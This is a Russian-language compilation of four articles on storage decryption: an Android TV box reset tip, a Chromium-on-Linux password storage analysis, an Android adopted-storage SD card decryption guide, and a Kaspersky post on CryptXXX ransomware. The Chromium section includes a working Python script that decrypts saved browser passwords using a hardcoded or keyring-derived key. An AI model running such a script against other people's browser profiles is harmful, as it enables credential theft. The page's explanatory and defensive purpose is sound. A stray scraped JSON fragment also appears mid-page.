Decrypt storage

Type password to decrypt storage – что это такое?

Decrypt storage

Type password to decrypt storage – что это такое?
Автор Andrey   
21:04:2015 г.
На моём Android TV Box ATV (MK888/K-R42/CS918) возникла ошибка  type password to decrypt storage. Возможно это возникло после неправильного выключения или сбоя по эл. питанию. Попробовав стандартные пароли я понял, что это проблема с прошивкой и т.д. В итоге всё решилось простым и банальным hard reset, как это сделать на Android TV Box ATV читайте ниже…Рецепт восстановления: выключаем устройство, подключаем заранее usb – клавиатуру, зажимаем кнопку Recovery, держим Recovery и держим кнопку включения, пока всё не заработает, устройство должно войти в режим настройки – выбираем пункт wipe data factory reset, ждём пока идёт процесс, потом restart device. Теперь нужно немного подождать, и после этого вы увидете уже ожившую ОС. 

 

Если у вас возник какой-либо вопрос присылайте его нам на почту

Из-за достаточно большого количества вопросов которых нам приходится решать, мы решили создать раздел Вопрос – Ответ , который поможет Вам не наступать на грабли. на которые наступили другие, и мы в том числе 🙂

 Наша идеология: “Помоги себе и другим” –  если у вас вознила проблема и вы её решили – присылайте нам – мы её опубликуем.

ВОПРОС – ОТВЕТ

  Вопрос:sony ericsson k 790 – устройство usb не обнаружено бла бла бла…

уже и скачивала драйвера из интернета устанавливаю,он пишет что драйвера не найдены установлено тип то что было установлено в прошлый раз,нажимала и откатить драйвера ,вообще ничего не происходит,нашла на каком-то сайте что причина решения проблемы может быть простой,отключитьпроцессор от питания,на 3-5 минут,не помогло,я уже не знаю что делать,что подскажете? заранее спасибо

   Ответ: тут нужно определиться, устройство usb не обнаружено или не найдены драйверы для устройства? Т.е. если телефон определяется как sony ericsson k 790то с соединением всё нормально, а нужно разбираться с драйверами.Думаюстоит попробовать:

1. В телефоне  при подключении к PC, выбрать в появившемсяменю – определяться флешкой.

2. Попробовать вставить в задний разъём компьютера – передние иногда не срабатывают.

3. Поменять провод – часто из-за него возникает проблема.

4. Проверить правильные ли вы скачиваете драйвера:

  – с официального сайта

  – подходят ли они на ваш windows, т.е. версия: XP,Vista, Win 7, разрядность 32 или 64 бита система

Вопрос:У меня usb флешка Transcend1gb, на задней стенке компьютера распознает, а на лицевой не опзнано.
 А usb флешка selicon power 4гб и та и тут опазнает. В чем дело, не пойму. Спасибо.

Ответ: Возможно контакты на флешках поразному срабатывают (на одной разболтаны, на другой нет), возможно питания не хватает – спереди оно меньше из-за удлинителя в корпусе – а сзади прямо вматеринку втыкаем.

Вопрос: У меня такая проблема:ноутбук Acer, раньше было всё нормально,видел,слышал всё что подключалось по USB.Далее начались проблемы-устройство не опознано….и т.дЗнакомые посоветовали купить хаб.Всё снова заработало замечательно!Теперь снова проблемы….

даже через хаб пишет что устройство не опознано.Причем это происходит по настроению компьютера.Бывает включишь компьютер,пройдет минут 30-40 всё замечательно видит.

А бывает вообще всёглухо!Обновила драйвера-бесполезно!

Посоветуйте что делать!!!Надеюсь на вашу помощь!

Ответ: Возможно вашему usb Hub не хватает мощности, так как Вы скорее всего купили пассивный хаб, приобретите активный  хаб – с блоком питания и всё будет стабильно работать. Особенно это касается подключения внешних жёстких дисков, сканеров и других устройств которым требуется повышенное питание по usb.

Вопрос: Доброго времени суток!
 Спасибо про статью об играх , которые пойдут на нетбуке.Я решил перестраховаться и спросить,какие игры пойдут на asus eee pc 1011px,желательно что то типо Асасина или гонки.

Ответ:  Я бы с удовольствием помог советом, но к сожалению нет такого ноутбука для тестирования. Скорее всего все указанные в списке игры пойдут, другие мощные трёхмерные врядли – нужен ноут или комп с нормальной видеокартой.

Если у вас возник какой либовопрос присылайте его нам на почту

Источник: http://asadmin.ru/content/view/799/1/

Chromium: Linux, keyrings && Secret Service, шифрование и хранение паролей

Decrypt storage

Одним из поводов настолько углубиться в keyrings (см. What is: Linux keyring, gnome-keyring, Secret Service, и D-Bus) был факт того, что Chromium, внезапно, при отсутствии keyring в Linux будет хранить пароли в «открытом виде».

Собственно, давайте попробуем найти — как и где Chromium хранит пароли, и, самое важное — шифрует ли он их?

Chromium и keyring

Документация нам говорит:

On Linux, Chrome previously stored credentials directly in the user‘s Gnome Keyring or KWallet, but for technical reasons, it has switched to storing the credentials in “Login Data” in the Chrome user’s profile directory, but encrypted on disk with a key that is then stored in the user’s Gnome Keyring or KWallet. If there is no available Keyring or KWallet, the data is not encrypted when stored.

Т.е:

  1. пароли Chromium хранит в SQLite базе «Login Data» ('/home/setevoy/.config/chromium/Default/Login Data')
  2. если gnome-keyring или KWallet установлены — то Chrome будет шифровать данные в базе с помощью пароля, который Chromium хранит в этом хранилище
  3. если их нет, и Secret Service не активен — то пароли будут храниться в открытом виде, plain text

Проверим.

Chromium без keyring

Попробуем получить пароль из базы с Chromium без keyring.

Что бы указать ему — какой бекенд использовать, можно использовать опцию google-chrome –password-store=basic — для хранения plain text.

Другие параметры — gnome или kwallet, см. man chromium:

–password-store=Set the password store to use.  The default is to  automaticallydetect  based  on  the  desktop  environment.  basic selects thebuilt in,  unencrypted  password  store.   gnome  selects  Gnomekeyring.  kwallet selects (KDE) KWallet.  (Note that KWallet maynot work reliably outside KDE.)

Кроме того — проверим D-Bus сервисы, что бы убедиться, что никакой Secret Service сейчас не активен:

qdbus –session org.freedesktop.DBus / org.freedesktop.DBus.GetConnectionUnixProcessID org.freedesktop.secretsError: org.freedesktop.DBus.Error.NameHasNoOwnerCould not get PID of name 'org.freedesktop.secrets': no such name

Хорошо.

Создаём каталог для данных Chromium:

mkdir /tmp/data-chrome-test-1

Запускаем браузер с указанием home на эту директорию и —password-store=basic, что бы сохрнаять пароли в открытом виде:

chromium –user-data-dir=/tmp/data-chrome-test-1 –password-store=basic

Логинимся куда-то, сохраняем пароль, закрываем браузер, проверяем базу:

sqlite3 /tmp/data-chrome-test-1/Default/Login\ Data 'select username_value, password_value from logins;'testuser|v10�#�c�yF�b�f���

Отлично — в поле password_value SQLite базы какой-то пароль есть.

Кстати, просмотреть все поля и их типы в таблице logins можно с помощью .schema:

sqlite3 ~/.config/chromium/Default/Login\ Data '.schema logins'CREATE TABLE IF NOT EXISTS “logins” (origin_url VARCHAR NOT NULL, action_url VARCHAR, \username_element VARCHAR, username_value VARCHAR, password_element VARCHAR, password_value BLOB \CREATE INDEX logins_signon ON logins (signon_realm);

Chromium с keyring

Теперь попробуем получить пароль из SQLite базы с Chromium, который использует keyring. Для этого — включаем поддержку Secret Service в KeePass, который нам заменит «стандартный»  gnome-keyring, и создаём второй каталог для данных Chromium:

mkdir /tmp/data-chrome-test-2

Запускаем браузер, но теперь указываем –password-store=gnome, и меняем user-data-dir, что бы использовать чистую SQLite базу с паролями:

chromium –user-data-dir=/tmp/data-chrome-test-2 –password-store=gnome

Ещё раз логинимся, сохраняем пароль, проверяем базу:

sqlite3 /tmp/data-chrome-test-2/Default/Login\ Data 'select username_value, password_value from logins;'testuser|v11���H!@���2�jA�

Ага!

Во-первых — префикс тут v11, а не v10, во-вторых — строка явно длиннее.

Chromium passwords decrypt

Теперь попробуем разобраться:

  1. во-первых — пароль из «незашифрованого» хранилища отдаётся явно не plain text — почему?
  2. во-вторых — как получить пароль из «зашифрованого» хранилища?

Для проверки — поковыряем исходники.

Chrome v10 vs v11

Для начала — что за v10 и v11?

Смотрим содержимое os_crypt_linux.cc — https://cs.chromium.org/chromium/src/components/os_crypt/os_crypt_linux.cc?l=38:

… // Password version. V10 means that the hardcoded password will be used. // V11 means that a password is/will be stored using an OS-level library (e.g // Libsecret). V11 will not be used if such a library is not available. // Used for array indexing. enum Version { V10 = 0, V11 = 1, }; …

Т.е. v10 — это префикс для незашифрованных паролей, а v11 — для зашифрованных.

Хотя при этом в обоих случаях выборка из SQLite возвращает нам набор символов, а не пароль в открытом виде…

Сейчас узнаем почему.

Начнём с конца файла, с функции DecryptString():

Так что всё оказалось намного проще:

  1. если keyring есть — то Chromium сгенерирует мастер-пароль, и сохранит в базе этого keyring-сервиса
  2. если keyring нет, и Secret Service отключен — то Chromium использует hardcoded мастер-пароль «peanuts«

И уже используя этот пароль — будет составлен key для шифрования паролей в SQLite базе данных.

Python скрипт для получения паролей

Теперь проверим всё это на практике, что бы «потрогать руками» и увидеть как оно в самом деле работает.

Среди прочего видим, что для шифрования используется AES 128 bit CBC:

… // Key size required for 128 bit AES. const size_t kDerivedKeySizeInBits = 128; …

Далее в функции GetEncryptionKey() смотрим, как создаётся ключ для шифрования:

… // Create an encryption key from our password and salt. std::unique_ptr encryption_key( crypto::SymmetricKey::DeriveKeyFromPasswordUsingPbkdf2( crypto::SymmetricKey::AES, *password, salt, kEncryptionIterations, kDerivedKeySizeInBits)); DCHECK(encryption_key); return encryption_key; …

Следовательно, что бы расшифровать запись из базы данных — нам нужны такие данные, всё указано сразу в файле в переменных:

  1. мастер-пароль password — именно он возвращается в GetPasswordV10() или GetPasswordV11()
  2. соль — const char kSalt[] = “saltysalt”
  3. итерации — const size_t kEncryptionIterations = 1
  4. длина ключа — const size_t kDerivedKeySizeInBits = 128

Для декрипта паролей — нагуглился простой скрипт тут>>>, немного его переделаем под себя, получается такой:

#! /usr/bin/env python3 import sqlite3 from Crypto.Cipher import AES from Crypto.Protocol.KDF import PBKDF2 def get_encrypted_data(db_path): # choose a database conn = sqlite3.connect(db_path) cursor = conn.cursor() # connect and egt exncypted data data = cursor.execute('SELECT action_url, username_value, password_value FROM logins') return data # to get rid of padding def clean(x): return x[:-x[-1]].decode('utf8') def get_decrypted_data(encrypted_password): print(“Decrypting the string: {}”.format(encrypted_password)) # trim off the 'v10' that Chrome/ium prepends encrypted_password = encrypted_password[3:] # making the key salt = b'saltysalt' iv = b' ' * 16 length = 16 iterations = 1 pb_pass = “peanuts”.encode('utf8') key = PBKDF2(pb_pass, salt, length, iterations) cipher = AES.new(key, AES.MODE_CBC, IV=iv) decrypted = cipher.decrypt(encrypted_password) print(clean(decrypted)) if __name__ == “__main__”: db_path = '/tmp/data-chrome-test-1/Default/Login Data' for url, user, encrypted_password in get_encrypted_data(db_path): get_decrypted_data(encrypted_password)

Запускаем:

Decrypting the string: b'v10\xd4#\xd6c\xabyF\xc6b\xdef\x06\xce\x14\xe3\xc5'

Отлично — есть наш пароль.

В этот раз мы получили его из «незашифрованного» хранилища.

Chromium && Secret Service

Теперь — включаем поддержку Secret Storage в KeePass (см What is: Linux keyring, gnome-keyring, Secret Service, и D-Bus), что бы эмулировать установленный gnome-keepass, перезапускаем KeePass.

Добавляем папку для новой базы данных Chromium:

mkdir /tmp/data-chrome-test-2/

Запускаем Chromium с каталогом данных data-chrome-test-2 из неё и указываем –password-store=gnome:

chromium –user-data-dir=/tmp/data-chrome-test-2/ –password-store=gnome

Логинимся, сохраняем пароль ещё раз — и Chromium в KeePass создал нам две записи:

  1. Chrome Safe Storage Control
  2. Chromium Safe Storage

Смотрим их атрибуты — там всё указано:

Можно посмотреть через D-Bus и Secret Service, что бы проверить коллекцию:

secret-tool search Title 'Chromium Safe Storage'[/org/freedesktop/secrets/collection/Main/f0fdc4706ef44958b716e28c13d66bed]label = Chromium Safe Storagesecret = P5pUwxbWaIBBVU0+LATOcw==schema = chrome_libsecret_os_crypt_password_v2attribute.Title = Chromium Safe Storageattribute.application = chromiumattribute.Path = /Chromium Safe Storage

Теперь попробуем использовать этот пароль (значение атрибута secret выше) из Chromium Safe Storage в качестве значения переменной pb_pass в нашем скрипте.

Выходим из Chromium, что бы разлочить базу, иначе будет ошибка вида:

Traceback (most recent call last):File “./get_chrome_pass.py”, line 50, in for url, user, encrypted_password in get_encrypted_data(db_path):File “./get_chrome_pass.py”, line 15, in get_encrypted_datadata = cursor.execute('SELECT action_url, username_value, password_value FROM logins')sqlite3.OperationalError: database is locked

В скрипте меняем базу (путь к ней):

… if __name__ == “__main__”: # db_path = '/tmp/data-chrome-test-1/Default/Login Data' db_path = '/tmp/data-chrome-test-2/Default/Login Data' for url, user, encrypted_password in get_encrypted_data(db_path): get_decrypted_data(encrypted_password)

Вместо «peanuts» подставляем в pb_pass значение из Chromium Safe Storage:

… # pb_pass = “peanuts”.encode('utf8') pb_pass = “P5pUwxbWaIBBVU0+LATOcw==”.encode('utf8') …

Пробуем:

Decrypting the string: b'v11\xfc\x82\xf7H!@\x86\xb7\x982\xa8\x1fjA\xfd'

Готово — получили пароль из зашифрованного значения SQLite базы.

Вывод

Собственно, самое важное — пароли в SQLite шифруются всегда. Просто для систем, в которых нет бекенда типа gnome-keyring с поддержкой Secret Service — то пароль для шифрования всегда будет один и тот же для всех пользователей Chromium, что, разумеется, нельзя рассматривать, как защиту.

Источник: https://rtfm.co.ua/chrome-chromium-linux-keyrings-security-service-i-xranenie-parolej/

Android M. SD-карта, как внутренняя память (Adopted Storage). Как прочитать на ПК?

Decrypt storage
В этом небольшом посте (все равно не спится) я постараюсь рассмотреть довольно интересную тему о том как можно получить доступ к данным находящимся на SD-карте, которая была использована как внутренняя память (adopted storage) на устройстве с Android 6.0 Masrhmallow на ПК без подключения к самому смартфону. Например, в случае когда он был поврежден или утерян.

На самом деле это не представляет особенных сложностей, при соблюдении ряда условий: вы должны предварительно сохранить ключ шифрования с устройства (сделать это можно, если у вас есть root-права или установлено кастомное recovery, например, TWRP с поддержкой расшифровки раздела userdata), также, у вас под рукой должен быть ПК с Linux и желательно с кардридером.

Чтобы пост был максимально полезным все положения / инструкции и т.п. которые вы в нем увидите я, естественно, буду проверять вместе с вами на практике. Поэтому приступим. Итак, у меня имеется Alcatel Idol 3 4.7″ 6039Y с Android M, Samsung'овская microSD на 16 Gb и ноутбук Acer Aspire ES 11 с установленной на нем Ubuntu 16.

04 (в более ранних версиях ОС заставить работать штатный кардридер мне, к сожалению, не удалось).

Вставляем microSD в телефон и форматируем ее как внутреннюю память и перемещаем на нее данные приложений:

Теперь мы должны получить root-доступ к телефону, чтобы скопировать с него ключ шифрования, либо установить кастомный recovery, например, TWRP. Я воспользуюсь именно вторым вариантом, тем более что TWRP 3.0.2-0 для этого аппарата я недавно пересобрал из исходников (взять бинарник можно тут, ну а для тех кто желает собрать TWRP для Idol 3 6039Y самостоятельно, дерево я выложил тут). Для прошивки TWRP в аппарат я использовал свой Sahara & Firehose Test (будущий Alcatel Flasher), как и что нужно делать для прошивки указано в посте, посвященном этому ПО, поэтому останавливаться отдельно на вопросах прошивки я не буду.

Загружаемся в TWRP и монтируем раздел Data в меню Mount. После чего подключаем аппарат к ПК и с помощью adb shell заходим в консоль. Где сначала с помощью команды ls /data/misc/vold определяем имя файла содержащего наш 16-байтный AES ключ, а потом с помощью hexdump, либо скопировав файл на ПК достаем сам ключ:

Таким образом наш 16-байтный AES ключ выглядит следующим образом: 00000000: B5 76 C1 F4-9B 1F B1 0F-0E 54 04 84-87 F3 52 AFТеперь можно достать флешку из телефона и переместиться за ПК с Linux. В моем случае это будет несколько проще, т.к. ноутбук с Ubuntu находится в одной сети с ПК с которого я пишу, поэтому я просто вставлю флешку в него, запущу x11vnc сервер на ноутбуке и VNC Viewer на том ПК с которого я пишу эту статью: Как мы видим вставленная microSD представляет собой устройство /dev/mmcblk1 на котором есть два раздела (!) – FAT32 (/dev/mmcblk1p1) с именем android_meta и зашифрованный aes-cbc-essiv:sha256 ext4 раздел (/dev/mmcblk1p2) с именем android_expand. Далее делаем следующее:

  • sudo blockdev –getsize /dev/mmcblk1p2 – узнаем размер устройства в блоках (31256543), получившееся значение мы будем использовать в следующей команде.
  • sudo dmsetup create crypt1 –table “0 31256543 crypt aes-cbc-essiv:sha256 B576C1F49B110F0E54048487F352AF 0 /dev/mmcblk1p2 0” (вся команда пишется в одну строку) – создаем “расшифрованное устройство” (да простят меня *nix пользователи, т.к. я не силен в данной терминологии) crypt1, которое потом мы и будем монтировать как ext4 … устройство должно создаться в /dev/mapper.
  • sudo dmsetup info – проверяем статус

После чего можно монтировать получившееся устройство /dev/mapper/crypt1 как ext4:

  • sudo mkdir /mnt/adopted
  • sudo mount -t ext4 /dev/mapper/crypt1 /mnt/adopted

Все должно выполниться без ошибок:

После чего запускаем тот же mc с правами root – sudo mc , переходим в папку /mnt/adopted и видим содержимое нашего adopted storage. Как видно все довольно просто:

В /media/0 у нас находятся все папки которые у нас “видны” с телефона как SD-карта, в /media/0/Android/data данные приложений, ну и далее по списку. “Размонтировать” флешку можно в обратном порядке, т.е.:

  • sudo umount /mnt/adopted
  • sudo dmsetup remove crypt1

После чего флешку можно извлекать из ПК. Ну вот вообщем-то и всё на сегодня. Как видите (и мы в этом убедились на практике) получить доступ к файлам хранящимся на adopted storage при наличии ключа шифрования не так уж и сложно. 

“,”author”:””,”date_published”:”2021-01-14T08:00:00.000Z”,”lead_image_url”:”https://4.bp.blogspot.com/-kNvPPGlpguU/V9yvhcVsOHI/AAAAAAAAKx0/Y-k6vH7wC_4SW5rIUsJ9AJUFLv82QHQOwCLcB/w1200-h630-p-k-no-nu/android_m_decrypt.jpg”,”dek”:null,”next_page_url”:null,”url”:”https://www.decker.su/2016/09/android-m-adopted-storage-decrypt.html”,”domain”:”www.decker.su”,”excerpt”:”В этом небольшом посте (все равно не спится) я постараюсь рассмотреть довольно интересную тему о том как можно получить доступ к данным н…”,”word_count”:658,”direction”:”ltr”,”total_pages”:1,”rendered_pages”:1}

Источник: https://www.decker.su/2016/09/android-m-adopted-storage-decrypt.html

CryptXXX зашифровал файлы. Как их расшифровать?

Decrypt storage

Как с точки зрения пользователя компьютера выглядит стандартная картина заражения каким-нибудь трояном-шифровальщиком? Вы зашли на некий сайт и, сами того не ведая, установили оттуда какую-то программу.

Некоторое время вроде бы ничего не происходит, а потом вдруг вылезает уведомление о том, что ваши файлы зашифрованы и надо платить выкуп. Вы проверяете — и действительно, у ваших файлов к имени добавилось зловещее расширение .

crypt, и они больше не открываются.

Что это значит? Это значит, что вы заразились вымогателем-шифровальщиком, известным под названием CryptXXX. Кстати, на самом деле все еще хуже: он не только шифрует файлы, но еще и ворует данные и биткойны. Хорошая новость состоит в том, что у нас от него есть лекарство — бесплатная утилита-расшифровщик. А теперь обо всем немного подробнее.

Что за зверь такой CryptXXX

Если вы ищете инструкцию по расшифровке файлов, то можете пропустить эту часть текста — прокрутите страницу вниз, там вы найдете то, что вам нужно. А здесь мы расскажем краткую историю происходящего.

15 апреля исследователи из Proofpoint обнаружили, что через эксплойт-кит Angler для Windows распространяется некий новый, ранее невиданный троянец-шифровальщик.

Исследователи назвали его CryptXXX, хотя сами создатели никакого специального имени для своего детища не придумали — опознать данного вымогателя при заражении можно только по тому, что он добавляет .

crypt к именам зашифрованных файлов.

Шифровальщик этот имеет несколько интересных особенностей. Во-первых, он запускает процедуру шифрования файлов на всех подключенных к компьютеру накопителях лишь через некоторое время после заражения. Его создатели предусмотрели эту задержку для того, чтобы было сложнее определить, какой именно сайт оказался заразным и принес на компьютер зловреда.

10 правил, которые помогут вам защитить свои файлы от заражения трояном-шифровальщиком: https://t.co/fTQ13YDoKp pic..com/OE5ik48iRo

— Kaspersky (@Kaspersky_ru) November 30, 2015

После того как троянец заканчивает с шифрованием, он создает три файла-инструкции: текстовый файл, картинку и веб-страницу HTML. Картинку он для наглядности ставит в качестве обоев рабочего стола, веб-страницу открывает в браузере, ну а текст оставляет, видимо, просто на всякий случай. всех инструкций более-менее одинаковое.

Они уведомляют пользователя о том, что его файлы зашифрованы с помощью достаточно стойкого алгоритма RSA4096, и требуют заплатить $500 в Bitcoin-эквиваленте за возвращение данных.

Пройдя по ссылке в инструкции (и предварительно установив браузер Tor, если он не был установлен ранее), пользователь попадает на onion-сайт, содержащий более подробные инструкции и собственно форму для оплаты.

И даже раздел с часто задаваемыми вопросами — все для клиентов!

Во-вторых, помимо шифрования файлов у CryptXXX обнаружилось еще несколько функций: он также крадет биткойны, сохраненные на жестких дисках, и другие данные, которые могут потенциально заинтересовать преступников.

Но у нас есть лекарство!

В последнее время часто бывает так, что для очередного нового троянца-шифровальщика не получается подобрать универсальный алгоритм расшифровки. В этом случае единственный способ вернуть файлы — это заплатить злоумышленникам выкуп. Мы это делать не рекомендуем, разве что в тех случаях, когда без этого совсем никак.

К счастью, CryptXXX — не тот случай, и у вирусных аналитиков «Лаборатории Касперского» получилось создать утилиту, которая помогает пользователям восстанавливать файлы, зашифрованные CryptXXX.

Внимание! Мы сделали дешифратор для бяки под именем #CryptXXX. Не дадим вымогателям шансов: https://t.co/pyDwXi9aEQ pic..com/pmBuaaxzPN

— Kaspersky (@Kaspersky_ru) April 25, 2016

Утилита RannohDecryptor изначально создавалась для расшифровки файлов, ставших пищей другого шифровальщика, Rannoh, но по мере появления новых троянцев она обрастала новой функциональностью. Теперь она позволяет устранить последствия деятельности CryptXXX.

Так что, если вы стали жертвой CryptXXX, не все потеряно. Для восстановления нам потребуется оригинальная, незашифрованная копия хотя бы одного из файлов, которые были зашифрованы вымогателем (если таких файлов у вас найдется больше — это только в плюс).

Дальше следует сделать вот что:

1. Скачайте с нашего сайта утилиту-расшифровщик и запустите ее.

2. Выберите в опциях типы дисков для сканирования. Галку «Удалять зашифрованные» ставить не стоит до тех пор, пока вы не будете на 100% уверены в том, что расшифрованные файлы нормально открываются.

3. Нажмите «Начать проверку», утилита запросит путь к зашифрованному файлу — укажите путь к зашифрованному файлу с расширением .crypt.

4. После этого утилита запросит путь к незашифрованному оригиналу того же файла — укажите его.

5. Затем утилита начнет поиск на дисках выбранных типов файлов с расширением .crypt и расшифрует все файлы, размер которых не превышает размер того файла, от которого у вас есть оригинал. Чем большего размера вам удастся найти оригинальный файл — тем больше файлов в итоге удастся расшифровать.

Будь готов!

Но лучше, конечно, не испытывать судьбу и не позволять CryptXXX проникнуть на ваш компьютер. Сейчас разработанная нашими вирусными аналитиками программа работает, однако злоумышленники достаточно быстро адаптируются к ситуации.

Нередко они меняют код зловредов так, что расшифровать файлы с помощью утилиты становится невозможно.

Например, так произошло с троянцем TeslaCrypt, для которого в свое время тоже была программа-дешифровщик, ставшая теперь практически бесполезной.

Почитайте вот про новую эпидемию трояна TeslaCrypt, который шифрует файлы на компьютере: https://t.co/TTj0SihZUZ pic..com/IOR4BLqywm

— Kaspersky (@Kaspersky_ru) December 17, 2015

К тому же не забывайте о том, что CryptXXX не только шифрует файлы, но и ворует данные, — не думаем, что вы с радостью захотите ими поделиться.

Чтобы избежать заражения, мы советуем следовать нескольким правилам безопасности:

1. Регулярно делайте резервные копии данных.

2. Не менее регулярно устанавливайте все важные обновления операционной системы и браузеров. Эксплойт-кит Angler, с помощью которого распространяется CryptXXX, использует уязвимости в программном обеспечении, чтобы получать права на скачивание и установку зловредов.

3. Установите хорошее защитное решение. Kaspersky Internet Security обеспечивает многослойную защиту от троянцев-шифровальщиков. А Kaspersky Total Security в дополнение к этому позволит автоматизировать создание бэкапов.

Подробнее о способах защиты от троянцев-шифровальщиков вы можете прочитать тут.

Обновление: похоже, злоумышленники тоже прочитали про наш декриптор и модифицировали CryptXXX таким образом, чтобы наша утилита не позволяла расшифровывать файлы. Однако специалисты из «Лаборатории Касперского» обновили утилиту, так что она способна справиться и с новой версией шифровальщика. Подробнее об этом можно прочитать тут.

Источник: https://www.kaspersky.ru/blog/cryptxxx-ransomware/11736/

Поделиться:
Нет комментариев

    Добавить комментарий

    Ваш e-mail не будет опубликован. Все поля обязательны для заполнения.